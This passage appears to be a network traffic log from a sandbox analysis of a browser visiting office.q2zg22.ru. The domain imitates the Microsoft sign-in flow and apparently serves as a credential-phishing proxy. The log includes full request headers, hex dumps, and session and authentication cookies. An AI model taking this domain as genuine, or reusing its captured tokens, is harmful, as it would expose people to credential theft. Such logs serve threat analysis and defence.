                                                                                                                          Data Ascii: cnm9Xpc8TTMUUFI8p2xLrmq4ixj7CYIeQ9CD7DZwYX58kg1InCIwgqYwsoIiVYxGiRLDKbg4nVhi6zgUONFkNwgy4ES7zy2SQV0JhWnTEFt8yqbCmsG6NmvapoAxqJA2QtEcOed71lxgfc6qsOnZ3uE3giOgYl03BHNiPMleHBxGoY6di-cbKXiT3dE835kvvSB8kPsmK8QaPKvzvpkiHugPrRXlkOtYZNkEJtptS1qsxvSR3rZpa6ZHouxOwXA


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          21192.168.2.1649745172.67.209.714435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:17:48 UTC1243OUTPOST /cdn-cgi/challenge-platform/h/b/jsd/r/84f4c6af994b451d HTTP/1.1
                                                                                                                          Host: office.q2zg22.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          Content-Length: 17041
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Content-Type: application/json
                                                                                                                          Accept: */*
                                                                                                                          Origin: https://office.q2zg22.ru
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: ae23-8632=afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04; fpc=Aq_odsI7GDJHm8suSWCV-X8; esctx=PAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-Vdc2TMKN3WgRVIPG2KYMe9cKLPhl_mFvXXBfxpTirUGdlKhgqDMpWnM2_5_gD1SjljL2-mhgQ9VoUJK3J_wvKRz3Sjbi4oTarW6t9Zz7ed5ioicPhWSPqwo0BZiORSIVftWlg5DNCJFrIgBxKMsmna1gkBhhlzTVsbGcOi6THtwgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; MUID=2E6F22D2EA936CD30EE836CBEBB26D97; esctx-sAcwFNXs9p0=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-Xz-zY4mFOFPtOKDCtkncDgiCqiq8JSPFEneyjDU4hFCxc9yKOXR0OSKd5FYQRJM3mXeQZYPo-cw18QcWUama1nI0_hypcV18IPjbFcAN8l-2_npQ8hQ5HCn_XXMqMr00sdRCGYoSBfgWdZ8ETjE1OiAA
                                                                                                                          2024-02-02 19:17:48 UTC16384OUTData Raw: 7b 22 77 70 22 3a 22 55 6f 7a 74 75 62 45 72 75 53 7a 75 57 2b 64 45 76 45 36 41 34 74 62 42 41 33 58 41 59 5a 59 6a 6a 62 72 45 56 68 41 6b 4a 42 49 4a 73 7a 41 31 6b 48 4b 64 4a 53 45 6c 41 57 76 7a 4e 6d 6f 6f 41 33 2d 6a 41 52 41 6a 42 6a 7a 45 41 24 6a 45 65 64 4f 74 2d 53 6f 30 66 37 74 6b 4a 6e 6f 58 33 35 6c 36 2b 4e 61 74 65 6e 75 77 58 67 45 35 68 6b 2d 59 41 75 7a 7a 44 59 31 62 30 6d 41 79 4e 6d 73 38 30 41 38 74 2b 31 41 62 77 7a 41 59 74 62 62 74 6e 57 74 59 41 45 4a 41 34 53 78 41 45 67 30 41 54 46 72 33 4e 6f 48 45 33 2d 6d 7a 41 62 46 30 41 62 64 4b 34 41 4b 62 41 45 30 24 73 69 7a 37 6c 58 42 62 4e 62 45 38 65 58 6f 68 75 6e 50 70 38 6b 41 5a 74 62 59 32 63 6f 41 72 78 6f 4a 2b 73 6b 43 24 4e 41 4b 70 38 2d 6e 5a 33 74 41 69 2d 5a 73 59
                                                                                                                          Data Ascii: {"wp":"UoztubEruSzuW+dEvE6A4tbBA3XAYZYjjbrEVhAkJBIJszA1kHKdJSElAWvzNmooA3-jARAjBjzEA$jEedOt-So0f7tkJnoX35l6+NatenuwXgE5hk-YAuzzDY1b0mAyNms80A8t+1AbwzAYtbbtnWtYAEJA4SxAEg0ATFr3NoHE3-mzAbF0AbdK4AKbAE0$siz7lXBbNbE8eXohunPp8kAZtbY2coArxoJ+skC$NAKp8-nZ3tAi-ZsY
                                                                                                                          2024-02-02 19:17:48 UTC657OUTData Raw: 2d 75 6e 41 6c 6a 44 31 45 54 45 36 37 70 38 2b 46 41 6f 74 54 32 49 38 45 46 41 68 53 4e 6b 45 32 59 63 38 75 4c 41 69 6a 75 41 4e 38 41 6f 41 52 6d 75 76 74 45 41 59 41 49 55 4f 6e 7a 73 41 4e 43 74 51 41 75 57 45 4c 74 7a 38 64 6b 33 78 45 37 4a 24 4a 58 65 45 38 74 33 6a 45 32 72 47 74 2b 32 6b 62 45 6e 7a 4b 59 4e 35 7a 50 6a 62 54 75 79 45 36 4f 73 4a 2b 46 41 44 41 37 69 62 63 79 6b 24 70 4f 75 76 58 4e 37 64 41 41 6a 41 4e 66 33 57 75 4c 41 70 6d 62 74 62 31 45 36 38 54 6a 75 48 41 63 59 41 6a 4e 57 41 47 74 71 49 6e 54 41 54 41 68 53 62 49 58 76 74 73 4a 62 63 41 59 74 52 6d 45 65 45 37 4a 63 38 4e 57 45 2d 51 6e 37 36 78 41 59 74 7a 4b 6b 6b 41 6f 69 6a 31 62 49 74 70 6d 6e 41 55 42 45 65 6a 33 69 4e 38 41 43 41 47 38 33 6b 41 5a 74 70 59 75 48
                                                                                                                          Data Ascii: -unAljD1ETE67p8+FAotT2I8EFAhSNkE2Yc8uLAijuAN8AoARmuvtEAYAIUOnzsANCtQAuWELtz8dk3xE7J$JXeE8t3jE2rGt+2kbEnzKYN5zPjbTuyE6OsJ+FADA7ibcyk$pOuvXN7dAAjANf3WuLApmbtb1E68TjuHAcYAjNWAGtqInTATAhSbIXvtsJbcAYtRmEeE7Jc8NWE-Qn76xAYtzKkkAoij1bItpmnAUBEej3iN8ACAG83kAZtpYuH
                                                                                                                          2024-02-02 19:17:48 UTC824INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 02 Feb 2024 19:17:48 GMT
                                                                                                                          Content-Type: text/plain; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Set-Cookie: cf_clearance=ce0oW76mtANxPk_4kyc3mBk42cWWnIOKaijg4RusDUc-1706901468-1-AeslQiFkGHYQohQV1EPcN2JU227xaAZFWW3gC7kcE9vFnxHvJuY8AnBotsMwex+qA7cxzTMhs69XAR33CiBa1pk=; path=/; expires=Sat, 01-Feb-25 19:17:48 GMT; domain=.q2zg22.ru; HttpOnly; Secure; SameSite=None
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vVfIpi%2FpMqP6RUB1TnKIun%2BcmiqPmLXZkBIwtdyU1XlD%2Bk3G44w70AaYaepKEEVuJMSj%2FpkJSLaSomi15%2FWZ7DG9R7FsvevzRVB%2B%2BhXcq3Xxo2B0NMqk1I4JeHAOEp47aSzq"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 84f4c6c0da8412ea-ATL
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2024-02-02 19:17:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          22192.168.2.1649747172.67.209.714435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:17:48 UTC2046OUTGET /favicon.ico HTTP/1.1
                                                                                                                          Host: office.q2zg22.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://office.q2zg22.ru/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638424982651072914.MTc3ZWVkZGQtYTZjNy00OTZlLTgxODctYWFiZGUzNzYwM2JlNjljY2M1YzEtZjRmNy00Njg2LTk5NzctYmUyYmY1ZDhiYjVi&ui_locales=en-US&mkt=en-US&client-request-id=27340d1a-f75c-4aed-bfd4-e7d89e08f2f5&state=Yvf-XDUrjz0oeLPkq8m6wvZNNx-4HHkagqS9BhHl9kXhuZbnWeP_boVBmzqCmf36UjRbbqyVFxS6NfMPtPrMzkYT0e3eC9jdOQOPVaXsUaKvdkKS66v9CzSs89a-xvCDlX83KjhHGwLHOIpviusPB2JbXEDMaguF9u_IRWYYWRgKHLprzYpu6YRCePlMSrde_70j5tZlDSgEnKs7NwUMbr6fRrt8o-EvCVkm0FfE3NnjacnfJhuLiNnd81beGyMvkxdpyTZsYXUvoKRGU0_4ng&x-client-SKU=ID_NET6_0&x-client-ver=6.34.0.0
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: ae23-8632=afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04; fpc=Aq_odsI7GDJHm8suSWCV-X8; esctx=PAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-Vdc2TMKN3WgRVIPG2KYMe9cKLPhl_mFvXXBfxpTirUGdlKhgqDMpWnM2_5_gD1SjljL2-mhgQ9VoUJK3J_wvKRz3Sjbi4oTarW6t9Zz7ed5ioicPhWSPqwo0BZiORSIVftWlg5DNCJFrIgBxKMsmna1gkBhhlzTVsbGcOi6THtwgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; MUID=2E6F22D2EA936CD30EE836CBEBB26D97; esctx-sAcwFNXs9p0=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-Xz-zY4mFOFPtOKDCtkncDgiCqiq8JSPFEneyjDU4hFCxc9yKOXR0OSKd5FYQRJM3mXeQZYPo-cw18QcWUama1nI0_hypcV18IPjbFcAN8l-2_npQ8hQ5HCn_XXMqMr00sdRCGYoSBfgWdZ8ETjE1OiAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          23192.168.2.1649746172.67.209.714435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:17:48 UTC2218OUTPOST /common/instrumentation/reportbssotelemetry?hpgid=6&hpgact=1800&client-request-id=27340d1a-f75c-4aed-bfd4-e7d89e08f2f5&hpgrequestid=ee59cf26-64c6-4c07-90c2-84adcb7a3200 HTTP/1.1
                                                                                                                          Host: office.q2zg22.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          Content-Length: 325
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Content-Type: text/plain;charset=UTF-8
                                                                                                                          Accept: */*
                                                                                                                          Origin: https://office.q2zg22.ru
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Referer: https://office.q2zg22.ru/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638424982651072914.MTc3ZWVkZGQtYTZjNy00OTZlLTgxODctYWFiZGUzNzYwM2JlNjljY2M1YzEtZjRmNy00Njg2LTk5NzctYmUyYmY1ZDhiYjVi&ui_locales=en-US&mkt=en-US&client-request-id=27340d1a-f75c-4aed-bfd4-e7d89e08f2f5&state=Yvf-XDUrjz0oeLPkq8m6wvZNNx-4HHkagqS9BhHl9kXhuZbnWeP_boVBmzqCmf36UjRbbqyVFxS6NfMPtPrMzkYT0e3eC9jdOQOPVaXsUaKvdkKS66v9CzSs89a-xvCDlX83KjhHGwLHOIpviusPB2JbXEDMaguF9u_IRWYYWRgKHLprzYpu6YRCePlMSrde_70j5tZlDSgEnKs7NwUMbr6fRrt8o-EvCVkm0FfE3NnjacnfJhuLiNnd81beGyMvkxdpyTZsYXUvoKRGU0_4ng&x-client-SKU=ID_NET6_0&x-client-ver=6.34.0.0
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: ae23-8632=afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04; fpc=Aq_odsI7GDJHm8suSWCV-X8; esctx=PAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-Vdc2TMKN3WgRVIPG2KYMe9cKLPhl_mFvXXBfxpTirUGdlKhgqDMpWnM2_5_gD1SjljL2-mhgQ9VoUJK3J_wvKRz3Sjbi4oTarW6t9Zz7ed5ioicPhWSPqwo0BZiORSIVftWlg5DNCJFrIgBxKMsmna1gkBhhlzTVsbGcOi6THtwgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; MUID=2E6F22D2EA936CD30EE836CBEBB26D97; esctx-sAcwFNXs9p0=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-Xz-zY4mFOFPtOKDCtkncDgiCqiq8JSPFEneyjDU4hFCxc9yKOXR0OSKd5FYQRJM3mXeQZYPo-cw18QcWUama1nI0_hypcV18IPjbFcAN8l-2_npQ8hQ5HCn_XXMqMr00sdRCGYoSBfgWdZ8ETjE1OiAA; AADSSO=NA|NoExtension
                                                                                                                          2024-02-02 19:17:48 UTC325OUTData Raw: 7b 22 72 65 73 75 6c 74 22 3a 22 45 72 72 6f 72 22 2c 22 65 72 72 6f 72 22 3a 22 4e 6f 45 78 74 65 6e 73 69 6f 6e 22 2c 22 74 79 70 65 22 3a 22 43 68 72 6f 6d 65 53 73 6f 54 65 6c 65 6d 65 74 72 79 22 2c 22 64 61 74 61 22 3a 7b 7d 2c 22 74 72 61 63 65 73 22 3a 5b 22 42 72 6f 77 73 65 72 53 53 4f 20 49 6e 69 74 69 61 6c 69 7a 65 64 22 2c 22 43 72 65 61 74 69 6e 67 20 43 68 72 6f 6d 65 42 72 6f 77 73 65 72 43 6f 72 65 20 70 72 6f 76 69 64 65 72 22 2c 22 53 65 6e 64 69 6e 67 20 6d 65 73 73 61 67 65 20 66 6f 72 20 6d 65 74 68 6f 64 20 43 72 65 61 74 65 50 72 6f 76 69 64 65 72 41 73 79 6e 63 22 2c 22 52 65 63 65 69 76 65 64 20 6d 65 73 73 61 67 65 20 66 6f 72 20 6d 65 74 68 6f 64 20 43 72 65 61 74 65 50 72 6f 76 69 64 65 72 41 73 79 6e 63 22 2c 22 45 72 72 6f
                                                                                                                          Data Ascii: {"result":"Error","error":"NoExtension","type":"ChromeSsoTelemetry","data":{},"traces":["BrowserSSO Initialized","Creating ChromeBrowserCore provider","Sending message for method CreateProviderAsync","Received message for method CreateProviderAsync","Erro
                                                                                                                          2024-02-02 19:17:48 UTC1009INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 02 Feb 2024 19:17:48 GMT
                                                                                                                          Content-Type: application/json; charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                          Cache-Control: no-cache, no-store
                                                                                                                          Expires: -1
                                                                                                                          Nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                          P3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                          Pragma: no-cache
                                                                                                                          Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                          Report-To: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://identity.nel.measure.office.net/api/report?catId=GW+estsfd+chi"}]}
                                                                                                                          Set-Cookie: fpc=Aq_odsI7GDJHm8suSWCV-X8; Path=/; Expires=Sun, 03 Mar 2024 19:17:48 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                          Set-Cookie: x-ms-gateway-slice=estsfd; Path=/; HttpOnly; Secure; SameSite=None
                                                                                                                          X-Ms-Ests-Server: 2.1.17216.2 - WUS3 ProdSlices
                                                                                                                          X-Ms-Request-Id: 89bf06f4-90ce-4752-bd0e-8eee3b117200
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 84f4c6c1cf3b06fa-ATL
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2024-02-02 19:17:48 UTC272INData Raw: 31 30 39 0d 0a 7b 22 61 70 69 43 61 6e 61 72 79 22 3a 22 50 41 51 41 42 41 41 45 41 41 41 41 6d 6f 46 66 47 74 59 78 76 52 72 4e 72 69 51 64 50 4b 49 5a 2d 71 5a 48 5a 30 79 4f 49 44 48 65 62 49 6b 49 64 30 5a 6d 45 39 33 72 63 37 59 39 2d 53 5a 38 65 34 76 57 77 6f 42 42 48 6c 67 76 47 66 74 4d 4d 75 52 44 72 44 52 38 44 38 74 63 6d 33 45 36 5f 78 44 56 54 61 55 45 65 50 72 54 79 6d 79 57 70 79 64 32 42 6e 5a 45 4f 76 55 46 49 76 6f 67 34 38 51 36 57 34 55 4e 53 79 4a 69 48 4e 6f 32 6a 39 6e 2d 59 34 78 76 35 70 7a 52 67 72 39 43 61 52 4d 69 54 46 54 47 54 6c 33 64 50 70 65 63 36 4e 47 67 4c 33 42 48 49 54 2d 4e 46 41 5f 43 75 6b 57 7a 70 5a 72 51 63 69 58 66 71 46 31 57 39 79 51 49 39 5a 6e 45 68 32 70 39 45 37 5a 32 74 61 72 68 36 62 70 32 57 7a 38 73
                                                                                                                          Data Ascii: 109{"apiCanary":"PAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-qZHZ0yOIDHebIkId0ZmE93rc7Y9-SZ8e4vWwoBBHlgvGftMMuRDrDR8D8tcm3E6_xDVTaUEePrTymyWpyd2BnZEOvUFIvog48Q6W4UNSyJiHNo2j9n-Y4xv5pzRgr9CaRMiTFTGTl3dPpec6NGgL3BHIT-NFA_CukWzpZrQciXfqF1W9yQI9ZnEh2p9E7Z2tarh6bp2Wz8s
                                                                                                                          2024-02-02 19:17:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          24192.168.2.1649750172.67.209.714435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:17:48 UTC1218OUTGET /cdn-cgi/challenge-platform/h/b/jsd/r/84f4c6af994b451d HTTP/1.1
                                                                                                                          Host: office.q2zg22.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: ae23-8632=afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04; fpc=Aq_odsI7GDJHm8suSWCV-X8; esctx=PAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-Vdc2TMKN3WgRVIPG2KYMe9cKLPhl_mFvXXBfxpTirUGdlKhgqDMpWnM2_5_gD1SjljL2-mhgQ9VoUJK3J_wvKRz3Sjbi4oTarW6t9Zz7ed5ioicPhWSPqwo0BZiORSIVftWlg5DNCJFrIgBxKMsmna1gkBhhlzTVsbGcOi6THtwgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; MUID=2E6F22D2EA936CD30EE836CBEBB26D97; esctx-sAcwFNXs9p0=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-Xz-zY4mFOFPtOKDCtkncDgiCqiq8JSPFEneyjDU4hFCxc9yKOXR0OSKd5FYQRJM3mXeQZYPo-cw18QcWUama1nI0_hypcV18IPjbFcAN8l-2_npQ8hQ5HCn_XXMqMr00sdRCGYoSBfgWdZ8ETjE1OiAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; cf_clearance=ce0oW76mtANxPk_4kyc3mBk42cWWnIOKaijg4RusDUc-1706901468-1-AeslQiFkGHYQohQV1EPcN2JU227xaAZFWW3gC7kcE9vFnxHvJuY8AnBotsMwex+qA7cxzTMhs69XAR33CiBa1pk=
                                                                                                                          2024-02-02 19:17:49 UTC711INHTTP/1.1 400 Bad Request
                                                                                                                          Date: Fri, 02 Feb 2024 19:17:49 GMT
                                                                                                                          Content-Type: application/json
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                          cf-chl-out: irYjF3oIduzqfKtS8EFvmA==$P8VHIERig6qma6T/KXlHVQ==
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Bq5qi5%2B%2BMnRj1a7n6OEPZg2hStJdYU57h6FSVS0TJf9JKO%2BNYb3KlIFmTMVuKjcfAeXNAmp%2FotkWdH1KbUc6BmWkO8QZn9YKBF43oV6kfMa7dPzlLadKD3Bc4h9YDACfmpYQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 84f4c6c5df9f44f3-ATL
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2024-02-02 19:17:49 UTC12INData Raw: 37 0d 0a 69 6e 76 61 6c 69 64 0d 0a
                                                                                                                          Data Ascii: 7invalid
                                                                                                                          2024-02-02 19:17:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          25192.168.2.1649754172.67.209.714435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:17:49 UTC2692OUTGET /s/afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04/521393ffd6e6e26814c2481ea580df56f06a765733586ff8dc0db635147b4d9a.js HTTP/1.1
                                                                                                                          Host: office.q2zg22.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                          Referer: https://office.q2zg22.ru/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638424982651072914.MTc3ZWVkZGQtYTZjNy00OTZlLTgxODctYWFiZGUzNzYwM2JlNjljY2M1YzEtZjRmNy00Njg2LTk5NzctYmUyYmY1ZDhiYjVi&ui_locales=en-US&mkt=en-US&client-request-id=27340d1a-f75c-4aed-bfd4-e7d89e08f2f5&state=Yvf-XDUrjz0oeLPkq8m6wvZNNx-4HHkagqS9BhHl9kXhuZbnWeP_boVBmzqCmf36UjRbbqyVFxS6NfMPtPrMzkYT0e3eC9jdOQOPVaXsUaKvdkKS66v9CzSs89a-xvCDlX83KjhHGwLHOIpviusPB2JbXEDMaguF9u_IRWYYWRgKHLprzYpu6YRCePlMSrde_70j5tZlDSgEnKs7NwUMbr6fRrt8o-EvCVkm0FfE3NnjacnfJhuLiNnd81beGyMvkxdpyTZsYXUvoKRGU0_4ng&x-client-SKU=ID_NET6_0&x-client-ver=6.34.0.0&sso_reload=true
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: ae23-8632=afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; MUID=2E6F22D2EA936CD30EE836CBEBB26D97; esctx-sAcwFNXs9p0=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-Xz-zY4mFOFPtOKDCtkncDgiCqiq8JSPFEneyjDU4hFCxc9yKOXR0OSKd5FYQRJM3mXeQZYPo-cw18QcWUama1nI0_hypcV18IPjbFcAN8l-2_npQ8hQ5HCn_XXMqMr00sdRCGYoSBfgWdZ8ETjE1OiAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; cf_clearance=ce0oW76mtANxPk_4kyc3mBk42cWWnIOKaijg4RusDUc-1706901468-1-AeslQiFkGHYQohQV1EPcN2JU227xaAZFWW3gC7kcE9vFnxHvJuY8AnBotsMwex+qA7cxzTMhs69XAR33CiBa1pk=; buid=0.AVoAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAAA.AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-0b0GHFUjypDPzYyRCP-j910iLVEABaRccpLk36B5zRBtQ3fob97QdMrqXsjTd5l0xaaXKm_REXXPLeGuMeGr-7qB7U4XkFGuAUABRnZJpCMgAA; esctx=PAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-Aetvl2btd8aqo8wzaMiV5Hf2kdb_IwSVTXuYe0uiIoKycm_q9g-RAse7WQ2x09SHTppANz6TPXL3R5FlIm2flV7nWh7dn4CXmsH-QoXUY5sWlBYRvTFD7wAAZHOGThUh_jbLwMoU4B1IcbiFQee9HxB3lxm4BtjIgZpVmvHJBF0gAA; esctx-M3Evdg9W3gI=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-JqQWhBFF3iERp8Semywl5LKbWyjZoUSF17HR6LRJwEeJzRn7zd5hZTtbNOswRWLDQ8kQv3hJMqkVu2XeDuIthdsdh_qgD7pZ2CcAHHgScJuPoGyxYFiTiJuI8--bsFrVKPZQGoqN7dxUP9axzl0FDSAA; fpc=Aq_odsI7GDJHm8suSWCV-X8
                                                                                                                          2024-02-02 19:17:49 UTC642INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 02 Feb 2024 19:17:49 GMT
                                                                                                                          Content-Type: application/javascript
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                          Cache-Control: no-cache, no-store
                                                                                                                          CF-Cache-Status: BYPASS
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=dT%2FmZxgfgbKSq4Y3ODknUYms8rV3HPMnAAOidzqwDX3DECok0A1M2xPgZMT4yjzBKBc6m8YERXQlwNYpUb92Dqx2GwQyf7LQVDMHjdalxEiaedGfPxi5csJ1C5ZjsFMD%2F5ZC"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 84f4c6c6cf8c53e7-ATL
                                                                                                                          alt-svc: h3=":443"; ma=86400
